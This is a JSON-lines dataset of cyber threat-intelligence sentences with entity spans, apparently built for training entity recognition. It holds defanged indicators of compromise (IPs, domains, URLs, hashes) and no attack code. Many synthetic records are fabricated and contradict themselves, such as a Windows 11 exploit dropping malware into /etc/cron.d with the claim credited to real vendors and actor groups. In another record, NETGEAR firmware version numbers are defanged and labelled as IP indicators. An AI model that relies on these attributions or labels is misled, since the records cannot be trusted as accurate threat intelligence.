{"text": "Vulnerability Advisory: CVE-2021-20463 is a critical authentication bypass affecting Windows 11. Cisco Talos confirmed active exploitation by APT29 in the wild. Exploitation delivers ShadowPad (MD5: 668e0db3b11603a371aad1719be99e09) which is dropped to /etc/cron.d/config.dat. The exploit payload is hosted at hxxp://mailcache[ . ]club/panel/index.html and communicates to 59 [ . ] 245 [ . ] 175 [ . ] 59 for C2.", "spans": {"Vulnerability: CVE-2021-20463": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Windows 11": [[85, 95]], "Organization: Cisco Talos": [[97, 108]], "Malware: ShadowPad": [[183, 192]], "Indicator: 668e0db3b11603a371aad1719be99e09": [[199, 231]], "Indicator: http://mailcache.club/panel/index.html": [[310, 352]], "Indicator: 59.245.175.59": [[373, 404]]}, "info": {"id": "synth_v2_00759", "source": "defanged_augment"}}
{"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center . In this case the legitimate hpqhvind[ . ]exe was dropped by the attackers , along with their malicious hpqhvsei[ . ]dll , in C:\\Windows\\Temp . KillNet has remained relatively consistent in its targeting of Ukraine ’s supporters and prioritization of DDoS attacks since Russia invaded in February 2022 , and despite new capabilities , the collective has hardly altered its targeting patterns .", "spans": {"Organization: employees": [[376, 385]], "Indicator: hpqhvind.exe": [[444, 460]], "Indicator: hpqhvsei.dll": [[519, 535]]}, "info": {"id": "cyberner_stix_train_000386", "source": "defanged_augment"}}
{"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . w[redacted][.]livehost[.]live : 443 . w[redacted][ . ]dnslookup[ . ]services : 443 . where the redacted part corresponds to the name of the targeted university . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"Organization: Trend Micro": [[328, 339]], "Indicator: w[redacted].livehost.live": [[375, 404]], "Indicator: w[redacted].dnslookup.services": [[413, 451]], "Vulnerability: vulnerabilities are accessible via the internet": [[577, 624]]}, "info": {"id": "cyberner_stix_train_007510", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Chisel artifacts at /usr/local/bin/lsass.dmp. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via /var/tmp/sam.hive. Network forensics identified connections to 102[.]11[.]110[.]38 and secure-static[.]tech. Email headers traced the initial vector to report@document-share[ . ]link. File C:\\Users\\admin\\Downloads\\taskhost.exe (MD5: 79453a7147bc47adcc84203273bc0114) was identified as the initial dropper. A staging URL hxxp://relaydata[.]club/collect resolved to 172[.]152[.]37[.]138. Secondary artifact hash: SHA256: 2eda58c885ea72f87853e0cb2aa8ae1923988cffd920d231b38b08e3432fcba6.", "spans": {"Indicator: 102.11.110.38": [[286, 305]], "Indicator: secure-static.tech": [[310, 330]], "Indicator: report@document-share.link": [[375, 405]], "Indicator: 79453a7147bc47adcc84203273bc0114": [[456, 488]], "Indicator: http://relaydata.club/collect": [[543, 574]], "Indicator: 172.152.37.138": [[587, 607]], "Indicator: 2eda58c885ea72f87853e0cb2aa8ae1923988cffd920d231b38b08e3432fcba6": [[642, 706]]}, "info": {"id": "synth_v2_01245", "source": "defanged_augment"}}
{"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . APT33 : 217 [ . ] 13 [ . ] 103 [ . ] 46 securityupdated[ . ]com . By comparison , the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER .", "spans": {"Organization: Check Point": [[4, 15]], "Malware: HummingBad": [[61, 71], [134, 144]], "Organization: Lookout": [[122, 129]], "Malware: Shedun": [[156, 162]], "Indicator: 217.13.103.46": [[461, 492]], "Indicator: securityupdated.com": [[493, 516]], "Malware: INDUSTROYER.V2": [[539, 553]], "Malware: malware": [[620, 627]], "Malware: INDUSTROYER": [[679, 690]]}, "info": {"id": "cyberner_stix_train_005941", "source": "defanged_augment"}}
{"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at C:\\Users\\admin\\AppData\\Local\\Temp\\csrss.exe - SHA256: a16a35403663a1262b4080e869303cc5f48c6278af283b0ebb6118822bc25c9f\nStage 2 loader at C:\\Windows\\Tasks\\implant.so - SHA1: c61f85d8f083079b4c2d2f2188786d1c8dc6d201\nFinal payload at C:\\Users\\admin\\Desktop\\lsass.dmp - SHA1: 2d1f09ae91bf2bf9f10c5e61138fdea4d3a2bbcf\nExfiltration module - SHA1: 5fb3b7373a3f44942e0d0dd1b14ab29a34ce1912\nAll stages communicated with 153 [ . ] 90 [ . ] 110 [ . ] 61. LinPEAS signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: a16a35403663a1262b4080e869303cc5f48c6278af283b0ebb6118822bc25c9f": [[114, 178]], "Indicator: c61f85d8f083079b4c2d2f2188786d1c8dc6d201": [[233, 273]], "Indicator: 2d1f09ae91bf2bf9f10c5e61138fdea4d3a2bbcf": [[332, 372]], "Indicator: 5fb3b7373a3f44942e0d0dd1b14ab29a34ce1912": [[401, 441]], "Indicator: 153.90.110.61": [[471, 502]]}, "info": {"id": "synth_v2_01993", "source": "defanged_augment"}}
{"text": "Screenshots : captures an image of the current screen via the raw frame buffer . The current campaign is a sharp escalation of detected activity since summer 2017 . Winnti : 44260a1d 2018-08-15 10:59:09 hxxps://dump[.]gxxservice[.]com/common/up/up_base.php . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"Indicator: https://dump.gxxservice.com/common/up/up_base.php": [[203, 256]]}, "info": {"id": "cyberner_stix_train_002342", "source": "defanged_augment"}}
{"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity . APT33 : 8[.]26[.]21[.]120 mynetwork[.]ddns[.]net . The ThreatConnect Platform centralizes threat intelligence , automates key activities and enables information sharing across the internal security organization and with external partners .", "spans": {"Organization: DHS": [[317, 320]], "Organization: FBI": [[325, 328]], "Indicator: 8.26.21.120": [[463, 480]], "Indicator: mynetwork.ddns.net": [[481, 503]]}, "info": {"id": "cyberner_stix_train_007225", "source": "defanged_augment"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online[.]bankaustria[.]at.id8817466 [ . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Unknown .", "spans": {"Malware: Sea Turtle": [[137, 147]], "Indicator: online.bankaustria.at": [[30, 55]]}, "info": {"id": "cyberner_stix_train_003963", "source": "defanged_augment"}}
{"text": "FIN7, also known as Carbanak Group and ITG14, targeted the U.S. hospitality and retail sectors with novel malware. The group sent phishing emails with malicious DOCX attachments exploiting CVE-2023-36884 in Microsoft Office. The payload, a JScript backdoor named Lizar, was dropped to C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js and beaconed to the C2 domain cdn-static-updates[ . ]com at IP 185 [ . ] 219 [ . ] 52 [ . ] 229. Additional C2 domains: api-gateway-service[ . ]com and storage-cloud-backup[.]net. The group also deployed Carbanak backdoor (SHA256 d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2) and used BloodHound for Active Directory reconnaissance. Cobalt Strike beacons connected to 45 [ . ] 129 [ . ] 14 [ . ] 88 and 91[.]195[.]240[.]117. The Lizar implant communicated over DNS TXT records to evade network detection.", "spans": {"Vulnerability: CVE-2023-36884": [[189, 203]], "System: Microsoft Office": [[207, 223]], "Malware: Lizar": [[263, 268], [775, 780]], "Indicator: cdn-static-updates.com": [[356, 382]], "Indicator: 185.219.52.229": [[389, 421]], "Indicator: api-gateway-service.com": [[446, 473]], "Indicator: storage-cloud-backup.net": [[478, 504]], "Malware: Carbanak": [[530, 538]], "Indicator: d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[556, 620]], "Malware: Cobalt Strike": [[679, 692]], "Indicator: 45.129.14.88": [[714, 744]], "Indicator: 91.195.240.117": [[749, 769]]}, "info": {"id": "malware_00023", "source": "defanged_augment"}}
{"text": "Artifact Analysis for StealC campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\payload.bin - MD5: 0c7c14a5a6c4fa603c4a8f1b24db09c2\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\sam.hive - SHA256: 0c44c651b481b3f2094a0e066ea6f274fa99be82235a944aa247f8d86927fe49\nFinal payload at /home/user/.config/chrome_helper.exe - SHA256: 988f361295b6c849bf478e26cd64f752b9a1a4fd7d8fe249bd8228e2145768bd\nExfiltration module - SHA256: 138418c77d26a48d6b3da213e52b9119e096659c22d4db8707c543135bf01b24\nAll stages communicated with 56[.]244[.]25[.]242. PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: StealC": [[22, 28]], "Indicator: 0c7c14a5a6c4fa603c4a8f1b24db09c2": [[94, 126]], "Indicator: 0c44c651b481b3f2094a0e066ea6f274fa99be82235a944aa247f8d86927fe49": [[198, 262]], "Indicator: 988f361295b6c849bf478e26cd64f752b9a1a4fd7d8fe249bd8228e2145768bd": [[327, 391]], "Indicator: 138418c77d26a48d6b3da213e52b9119e096659c22d4db8707c543135bf01b24": [[422, 486]], "Indicator: 56.244.25.242": [[516, 535]]}, "info": {"id": "synth_v2_01931", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Teper Trojan/AutoRun[ . ]Delf[ . ]lv Trojan.MSIL.Krypt.11 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_INJECTOR_FA250012.UVPM Trojan.Win32.DarkKomet.dkhkpy TrojWare.MSIL.Teper.A Trojan.PWS.Stealer.13025 TROJ_INJECTOR_FA250012.UVPM BehavesLike.Win32.Trojan.dc Backdoor/Androm.dvy TR/Inject.xbbeiet W32/Vobfus.GEP.worm Win32/AutoRun[ . ]Delf[ . ]LV Win32.Worm.Autorun.Suxp Win32/Trojan.d74", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: AutoRun.Delf.lv": [[46, 69]], "Indicator: AutoRun.Delf.LV": [[359, 382]]}, "info": {"id": "cyner2_train_007255", "source": "defanged_augment"}}
{"text": "Proofpoint detected a multi-stage attack chain. The initial phishing email from noreply@secure-verify[.]net contained a link to hxxps://static-edge[ . ]io/portal/verify. This redirected to hxxp://static-cloud[.]xyz/assets/js/payload.js on proxydata[.]link. A secondary email from ceo@auth-check[ . ]org pointed to hxxps://relay-login[ . ]info/secure/token which delivered Ryuk. The final payload callback was hxxps://secure-proxy[.]tech/download/update.exe resolving to 10[.]163[.]25[.]199 via proxy-secure[.]org.", "spans": {"Organization: Proofpoint": [[0, 10]], "Indicator: noreply@secure-verify.net": [[80, 107]], "Indicator: hxxps://static-edge.io/portal/verify": [[128, 168]], "Indicator: http://static-cloud.xyz/assets/js/payload.js": [[189, 235]], "Indicator: proxydata.link": [[239, 255]], "Indicator: ceo@auth-check.org": [[280, 302]], "Indicator: https://relay-login.info/secure/token": [[314, 355]], "Malware: Ryuk": [[372, 376]], "Indicator: https://secure-proxy.tech/download/update.exe": [[409, 456]], "Indicator: 10.163.25.199": [[470, 489]], "Indicator: proxy-secure.org": [[494, 512]]}, "info": {"id": "synth_v2_01847", "source": "defanged_augment"}}
{"text": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects AC2100 before 1 [ . ] 2 [ . ] 0 [ . ] 72, AC2400 before 1[.]2[.]0[.]72, AC2600 before 1[.]2[.]0[.]72, CBK40 before 2 [ . ] 5 [ . ] 0 [ . ] 10, CBR40 before 2 [ . ] 5 [ . ] 0 [ . ] 10, D6000 before 1 [ . ] 0 [ . ] 0 [ . ] 80, D6220 before 1 [ . ] 0 [ . ] 0 [ . ] 60, D6400 before 1 [ . ] 0 [ . ] 0 [ . ] 94, D7000v2 before 1 [ . ] 0 [ . ] 0 [ . ] 62, D7800 before 1[.]0[.]3[.]48, D8500 before 1[.]0[.]3[.]50, DC112A before 1[.]0[.]0[.]48, DGN2200v4 before 1 [ . ] 0 [ . ] 0 [ . ] 114, DM200 before 1[.]0[.]0[.]66, EAX20 before 1 [ . ] 0 [ . ] 0 [ . ] 36, EAX80 before 1[.]0[.]1[.]62, EX2700 before 1[.]0[.]1[.]58, EX3110 before 1[.]0[.]1[.]68, EX3700 before 1[.]0[.]0[.]84, EX3800 before 1[.]0[.]0[.]84, EX3920 before 1 [ . ] 0 [ . ] 0 [ . ] 84, EX6000 before 1 [ . ] 0 [ . ] 0 [ . ] 44, EX6100v2 before 1[.]0[.]1[.]94, EX6110 before 1[.]0[.]1[.]68, EX6120 before 1 [ . ] 0 [ . ] 0 [ . ] 54, EX6130 before 1 [ . ] 0 [ . ] 0 [ . ] 36, EX6150v1 before 1[.]0[.]0[.]46, EX6150v2 before 1[.]0[.]1[.]94, EX6200v1 before 1[.]0[.]3[.]94, EX6250 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX6400 before 1 [ . ] 0 [ . ] 2 [ . ] 152, EX6400v2 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX6410 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX6920 before 1 [ . ] 0 [ . ] 0 [ . ] 54, EX7000 before 1[.]0[.]1[.]90, EX7300 before 1 [ . ] 0 [ . ] 2 [ . ] 152, EX7300v2 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX7320 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX7500 before 1[.]0[.]0[.]68, EX7700 before 1[.]0[.]0[.]210, EX8000 before 1 [ . ] 0 [ . ] 1 [ . ] 224, MK62 before 1[.]0[.]5[.]102, MR60 before 1[.]0[.]5[.]102, MS60 before 1[.]0[.]5[.]102, R6120 before 1[.]0[.]0[.]70, R6220 before 1[.]1[.]0[.]100, R6230 before 1[.]1[.]0[.]100, R6250 before 1[.]0[.]4[.]42, R6260 before 1[.]1[.]0[.]76, R6300v2 before 1 [ . ] 0 [ . ] 4 [ . ] 42, R6330 before 1[.]1[.]0[.]76, R6350 before 1 [ . ] 1 [ . ] 0 [ . ] 76, R6400v1 before 1 [ . ] 0 [ . ] 1 [ . ] 62, R6400v2 before 1[.]0[.]4[.]98, R6700v1 before 1[.]0[.]2[.]16, R6700v2 before 1[.]2[.]0[.]72, R6700v3 before 1[.]0[.]4[.]98, R6800 before 1[.]2[.]0[.]72, R6800 before 1[.]2[.]0[.]72, R6850 before 1 [ . ] 1 [ . ] 0 [ . ] 76, R6900 before 1 [ . ] 0 [ . ] 2 [ . ] 16, R6900P before 1 [ . ] 3 [ . ] 2 [ . ] 124, R6900v2 before 1[.]2[.]0[.]72, R7000 before 1 [ . ] 0 [ . ] 11 [ . ] 106, R7000P before 1 [ . ] 3 [ . ] 2 [ . ] 124, R7100LG before 1[.]0[.]0[.]56, R7200 before 1[.]2[.]0[.]72, R7350 before 1[.]2[.]0[.]72, R7400 before 1 [ . ] 2 [ . ] 0 [ . ] 72, R7450 before 1 [ . ] 2 [ . ] 0 [ . ] 72, R7500v2 before 1[.]0[.]3[.]48, R7800 before 1 [ . ] 0 [ . ] 2 [ . ] 74, R7850 before 1[.]0[.]5[.]60, R7900 before 1 [ . ] 0 [ . ] 4 [ . ] 26, R7900P before 1[.]4[.]1[.]62, R7960P before 1[.]4[.]1[.]62, R8000 before 1 [ . ] 0 [ . ] 4 [ . ] 58, R8000P before 1[.]4[.]1[.]62, R8300 before 1[.]0[.]2[.]134, R8500 before 1 [ . ] 0 [ . ] 2 [ . ] 134, R8900 before 1[.]0[.]5[.]24, R9000 before 1[.]0[.]5[.]24, RAX120 before 1 [ . ] 0 [ . ] 1 [ . ] 136, RAX15 before 1[.]0[.]1[.]64, RAX20 before 1 [ . ] 0 [ . ] 1 [ . ] 64, RAX200 before 1 [ . ] 0 [ . ] 5 [ . ] 24, RAX35 before 1 [ . ] 0 [ . ] 3 [ . ] 80, RAX40 before 1[.]0[.]3[.]80, RAX45 before 1[.]0[.]2[.]64, RAX50 before 1 [ . ] 0 [ . ] 2 [ . ] 64, RAX75 before 1[.]0[.]3[.]102, RAX80 before 1 [ . ] 0 [ . ] 3 [ . ] 102, RBK12 before 2 [ . ] 6 [ . ] 1 [ . ] 44, RBR10 before 2[.]6[.]1[.]44, RBS10 before 2[.]6[.]1[.]44, RBK20 before 2[.]6[.]1[.]38, RBR20 before 2[.]6[.]1[.]36, RBS20 before 2[.]6[.]1[.]38, RBK40 before 2 [ . ] 6 [ . ] 1 [ . ] 38, RBR40 before 2[.]6[.]1[.]38, RBS40 before 2[.]6[.]1[.]38, RBK50 before 2[.]6[.]1[.]40, RBR50 before 2[.]6[.]1[.]40, RBS50 before 2 [ . ] 6 [ . ] 1 [ . ] 40, RBK752 before 3[.]2[.]16[.]6, RBR750 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBS750 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBK842 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBR840 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBS840 before 3[.]2[.]16[.]6, RBK852 before 3[.]2[.]16[.]6, RBR850 before 3[.]2[.]16[.]6, RBS850 before 3[.]2[.]16[.]6, RBS40V before 2 [ . ] 5 [ . ] 1 [ . ] 6, RBS40V-200 before 1 [ . ] 0 [ . ] 0 [ . ] 46, RBS50Y before 2 [ . ] 6 [ . ] 1 [ . ] 40, RBW30 before 2 [ . ] 5 [ . ] 0 [ . ] 4, RS400 before 1[.]5[.]0[.]48, WN2500RPv2 before 1[.]0[.]1[.]56, WN3000RPv3 before 1[.]0[.]2[.]86, WN3500RPv1 before 1[.]0[.]0[.]28, WNDR3400v3 before 1[.]0[.]1[.]32, WNR1000v3 before 1[.]0[.]2[.]78, WNR2000v2 before 1 [ . ] 2 [ . ] 0 [ . ] 12, XR300 before 1 [ . ] 0 [ . ] 3 [ . ] 50, XR450 before 2 [ . ] 3 [ . ] 2 [ . ] 66, XR500 before 2 [ . ] 3 [ . ] 2 [ . ] 66, and XR700 before 1[.]0[.]1[.]34.", "spans": {"Indicator: 1.2.0.72": [[113, 139], [155, 169], [185, 199], [2076, 2090], [2136, 2150], [2165, 2179], [2321, 2335], [2467, 2481], [2496, 2510], [2525, 2551], [2566, 2592]], "Indicator: 2.5.0.10": [[214, 240], [255, 281]], "Indicator: 1.0.0.80": [[296, 322]], "Indicator: 1.0.0.60": [[337, 363]], "Indicator: 1.0.0.94": [[378, 404]], "Indicator: 1.0.0.62": [[421, 447]], "Indicator: 1.0.3.48": [[462, 476], [2609, 2623]], "Indicator: 1.0.3.50": [[491, 505], [4491, 4517]], "Indicator: 1.0.0.48": [[521, 535]], "Indicator: 1.0.0.114": [[554, 581]], "Indicator: 1.0.0.66": [[596, 610]], "Indicator: 1.0.0.36": [[625, 651], [1004, 1030]], "Indicator: 1.0.1.62": [[666, 680], [1971, 1997]], "Indicator: 1.0.1.58": [[696, 710]], "Indicator: 1.0.1.68": [[726, 740], [932, 946]], "Indicator: 1.0.0.84": [[756, 770], [786, 800], [816, 842]], "Indicator: 1.0.0.44": [[858, 884]], "Indicator: 1.0.1.94": [[902, 916], [1080, 1094]], "Indicator: 1.0.0.54": [[962, 988], [1316, 1342]], "Indicator: 1.0.0.46": [[1048, 1062], [4125, 4151]], "Indicator: 1.0.3.94": [[1112, 1126]], "Indicator: 1.0.0.128": [[1142, 1169], [1230, 1257], [1273, 1300], [1433, 1460], [1476, 1503]], "Indicator: 1.0.2.152": [[1185, 1212], [1388, 1415]], "Indicator: 1.0.1.90": [[1358, 1372]], "Indicator: 1.0.0.68": [[1519, 1533]], "Indicator: 1.0.0.210": [[1549, 1564]], "Indicator: 1.0.1.224": [[1580, 1607]], "Indicator: 1.0.5.102": [[1621, 1636], [1650, 1665], [1679, 1694]], "Indicator: 1.0.0.70": [[1709, 1723]], "Indicator: 1.1.0.100": [[1738, 1753], [1768, 1783]], "Indicator: 1.0.4.42": [[1798, 1812], [1858, 1884]], "Indicator: 1.1.0.76": [[1827, 1841], [1899, 1913], [1928, 1954], [2194, 2220]], "Indicator: 1.0.4.98": [[2014, 2028], [2107, 2121]], "Indicator: 1.0.2.16": [[2045, 2059], [2235, 2261]], "Indicator: 1.3.2.124": [[2277, 2304], [2394, 2421]], "Indicator: 1.0.11.106": [[2350, 2378]], "Indicator: 1.0.0.56": [[2438, 2452]], "Indicator: 1.0.2.74": [[2638, 2664]], "Indicator: 1.0.5.60": [[2679, 2693]], "Indicator: 1.0.4.26": [[2708, 2734]], "Indicator: 1.4.1.62": [[2750, 2764], [2780, 2794], [2851, 2865]], "Indicator: 1.0.4.58": [[2809, 2835]], "Indicator: 1.0.2.134": [[2880, 2895], [2910, 2937]], "Indicator: 1.0.5.24": [[2952, 2966], [2981, 2995], [3124, 3150]], "Indicator: 1.0.1.136": [[3011, 3038]], "Indicator: 1.0.1.64": [[3053, 3067], [3082, 3108]], "Indicator: 1.0.3.80": [[3165, 3191], [3206, 3220]], "Indicator: 1.0.2.64": [[3235, 3249], [3264, 3290]], "Indicator: 1.0.3.102": [[3305, 3320], [3335, 3362]], "Indicator: 2.6.1.44": [[3377, 3403], [3418, 3432], [3447, 3461]], "Indicator: 2.6.1.38": [[3476, 3490], [3534, 3548], [3563, 3589], [3604, 3618], [3633, 3647]], "Indicator: 2.6.1.36": [[3505, 3519]], "Indicator: 2.6.1.40": [[3662, 3676], [3691, 3705], [3720, 3746], [4167, 4193]], "Indicator: 3.2.16.6": [[3762, 3776], [3792, 3818], [3834, 3860], [3876, 3902], [3918, 3944], [3960, 3974], [3990, 4004], [4020, 4034], [4050, 4064]], "Indicator: 2.5.1.6": [[4080, 4105]], "Indicator: 2.5.0.4": [[4208, 4233]], "Indicator: 1.5.0.48": [[4248, 4262]], "Indicator: 1.0.1.56": [[4282, 4296]], "Indicator: 1.0.2.86": [[4316, 4330]], "Indicator: 1.0.0.28": [[4350, 4364]], "Indicator: 1.0.1.32": [[4384, 4398]], "Indicator: 1.0.2.78": [[4417, 4431]], "Indicator: 1.2.0.12": [[4450, 4476]], "Indicator: 2.3.2.66": [[4532, 4558], [4573, 4599]], "Indicator: 1.0.1.34": [[4618, 4632]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35800"}}
{"text": "Malware Analysis Report: Lumma Stealer (SHA256: 06948d09af44afdd113fc92928e6fe8b9aa65470558e30794a97933dd51e4d9e). Upon execution on SonicWall SMA, the sample creates /dev/shm/helper.sh and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 182 [ . ] 49 [ . ] 98 every 60 seconds and DNS queries to staticcloud[ . ]dev. The second stage was fetched from hxxps://storage-cdn[.]live/secure/token and written to /opt/app/bin/beacon.dll. The payload uses PsExec-style techniques for defense evasion. A secondary hash (SHA1: e153351fcd673f171a2db9790bc0f24b2f9f26bb) was extracted from the unpacked payload.", "spans": {"Malware: Lumma Stealer": [[25, 38]], "Indicator: 06948d09af44afdd113fc92928e6fe8b9aa65470558e30794a97933dd51e4d9e": [[48, 112]], "System: SonicWall SMA": [[133, 146]], "Indicator: 172.182.49.98": [[261, 292]], "Indicator: staticcloud.dev": [[329, 348]], "Indicator: https://storage-cdn.live/secure/token": [[384, 423]], "Indicator: e153351fcd673f171a2db9790bc0f24b2f9f26bb": [[550, 590]]}, "info": {"id": "synth_v2_00637", "source": "defanged_augment"}}
{"text": "Credentials targeted by PinchDuke include ones associated with the following software or services : The Bat! , Yahoo! , Mail[.]ru , Passport[ . ]Net , Google Talk , Netscape Navigator , Mozilla Firefox , Mozilla Thunderbird , Internet Explorer , Microsoft Outlook , WinInet Credential Cache , Lightweight Directory Access Protocol ( LDAP ) .", "spans": {"Malware: PinchDuke": [[24, 33]], "Indicator: Mail.ru": [[120, 129]], "Indicator: Passport.Net": [[132, 148]], "Organization: Microsoft": [[246, 255]]}, "info": {"id": "cyberner_stix_train_002841", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Mandiant identified a large-scale phishing operation. Emails originated from verify@mail-service[ . ]info and confirm@urgent-notice[ . ]online, spoofing legitimate services. Victims were directed to hxxp://static-static[ . ]club/portal/verify which hosted a credential harvesting page on relay-mail[ . ]dev. A secondary link hxxp://edge-mail[ . ]site/login delivered Emotet (SHA256: 3bf7d3c91132b6d5231429b9b547b91951c423589d1e09945ff9e86ca3448c46). The malware was saved to /tmp/update.dll and established C2 with 185 [ . ] 199 [ . ] 206 [ . ] 27.", "spans": {"Organization: Mandiant": [[26, 34]], "Indicator: verify@mail-service.info": [[103, 131]], "Indicator: confirm@urgent-notice.online": [[136, 168]], "Indicator: http://static-static.club/portal/verify": [[225, 268]], "Indicator: relay-mail.dev": [[314, 332]], "Indicator: hxxp://edge-mail.site/login": [[351, 382]], "Malware: Emotet": [[393, 399]], "Indicator: 3bf7d3c91132b6d5231429b9b547b91951c423589d1e09945ff9e86ca3448c46": [[409, 473]], "Indicator: 185.199.206.27": [[541, 573]]}, "info": {"id": "synth_v2_00879", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_ncm: fix potential NULL ptr deref in ncm_bitrate()\n\nIn Google internal bug 265639009 we've received an (as yet) unreproducible\ncrash report from an aarch64 GKI 5.10.149-android13 running device.\n\nAFAICT the source code is at:\n  hxxps://android[.]googlesource[.]com/kernel/common/+/refs/tags/ASB-2022-12-05_13-5.10\n\nThe call stack is:\n  ncm_close() -> ncm_notify() -> ncm_do_notify()\nwith the crash at:\n  ncm_do_notify+0x98/0x270\nCode: 79000d0b b9000a6c f940012a f9400269 (b9405d4b)\n\nWhich I believe disassembles to (I don't know ARM assembly, but it looks sane enough to me...):\n\n  // halfword (16-bit) store presumably to event->wLength (at offset 6 of struct usb_cdc_notification)\n  0B 0D 00 79    strh w11, [x8, #6]\n\n  // word (32-bit) store presumably to req->Length (at offset 8 of struct usb_request)\n  6C 0A 00 B9    str  w12, [x19, #8]\n\n  // x10 (NULL) was read here from offset 0 of valid pointer x9\n  // IMHO we're reading 'cdev->gadget' and getting NULL\n  // gadget is indeed at offset 0 of struct usb_composite_dev\n  2A 01 40 F9    ldr  x10, [x9]\n\n  // loading req->buf pointer, which is at offset 0 of struct usb_request\n  69 02 40 F9    ldr  x9, [x19]\n\n  // x10 is null, crash, appears to be attempt to read cdev->gadget->max_speed\n  4B 5D 40 B9    ldr  w11, [x10, #0x5c]\n\nwhich seems to line up with ncm_do_notify() case NCM_NOTIFY_SPEED code fragment:\n\n  event->wLength = cpu_to_le16(8);\n  req->length = NCM_STATUS_BYTECOUNT;\n\n  /* SPEED_CHANGE data is up/down speeds in bits/sec */\n  data = req->buf + sizeof *event;\n  data[0] = cpu_to_le32(ncm_bitrate(cdev->gadget));\n\nMy analysis of registers and NULL ptr deref crash offset\n  (Unable to handle kernel NULL pointer dereference at virtual address 000000000000005c)\nheavily suggests that the crash is due to 'cdev->gadget' being NULL when executing:\n  data[0] = cpu_to_le32(ncm_bitrate(cdev->gadget));\nwhich calls:\n  ncm_bitrate(NULL)\nwhich then calls:\n  gadget_is_superspeed(NULL)\nwhich reads\n  ((struct usb_gadget *)NULL)->max_speed\nand hits a panic.\n\nAFAICT, if I'm counting right, the offset of max_speed is indeed 0x5C.\n(remember there's a GKI KABI reservation of 16 bytes in struct work_struct)\n\nIt's not at all clear to me how this is all supposed to work...\nbut returning 0 seems much better than panic-ing...", "spans": {"Indicator: https://android.googlesource.com/kernel/common/+/refs/tags/ASB-2022-12-05_13-5.10": [[312, 397]], "System: Linux kernel": [[7, 19]], "Organization: Google": [[139, 145]], "Vulnerability: NULL pointer dereference": [[1755, 1779]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-52894"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 71[.]227[.]188[.]3, the Europol IR team identified Dridex running as C:\\Users\\admin\\Downloads\\lsass.dmp. The threat actor, believed to be Velvet Tempest, used Brute Ratel for credential harvesting and Havoc for lateral movement. Exfiltrated data was sent to update-cache[.]cc and syncauth[.]link. The initial dropper (MD5: 62472b50f126dc17cca3586b6796feda) was delivered via a phishing email from noreply@secure-verify[.]net. A second C2 node was observed at 10[.]42[.]62[.]126, with a persistence mechanism writing to /dev/shm/ntds.dit.", "spans": {"Indicator: 71.227.188.3": [[64, 82]], "Organization: Europol": [[88, 95]], "Malware: Dridex": [[115, 121]], "Indicator: update-cache.cc": [[322, 339]], "Indicator: syncauth.link": [[344, 359]], "Indicator: 62472b50f126dc17cca3586b6796feda": [[387, 419]], "Indicator: noreply@secure-verify.net": [[461, 488]], "Indicator: 10.42.62.126": [[523, 541]]}, "info": {"id": "synth_v2_00337", "source": "defanged_augment"}}
